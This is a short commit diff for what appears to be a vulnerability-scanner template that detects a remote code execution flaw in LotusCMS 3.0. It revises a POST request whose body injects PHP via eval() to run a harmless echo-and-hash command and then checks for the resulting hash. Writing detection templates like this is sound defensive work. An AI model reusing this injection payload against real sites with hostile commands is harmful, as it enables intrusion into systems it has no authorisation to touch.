minor updates

patch-1
sandeep 2021-07-04 17:09:45 +05:30
parent ecdd86167a
commit 457ce76e34
1 changed files with 6 additions and 6 deletions

View File

@ -1,7 +1,7 @@
id: lotuscms-rce id: lotuscms-rce
info: info:
name: LotusCMS 3.0 - RCE name: LotusCMS 3.0 eval() RCE
author: pikpikcu author: pikpikcu
severity: critical severity: critical
reference: https://github.com/Hood3dRob1n/LotusCMS-Exploit reference: https://github.com/Hood3dRob1n/LotusCMS-Exploit
@ -11,20 +11,20 @@ requests:
- method: POST - method: POST
path: path:
- "{{BaseURL}}/index.php" - "{{BaseURL}}/index.php"
# - "{{BaseURL}}/lcms/index.php" - "{{BaseURL}}/lcms/index.php"
headers: headers:
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
body: | body: |
page=index');${system(phpinfo())};# page=index');${system('echo lotuscms_rce | md5sum')};#
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- "PHP Version" - "38ee63071a04dc5e04ed22624c38e648"
part: body part: body
- type: status - type: status
status: status:
- 200 - 200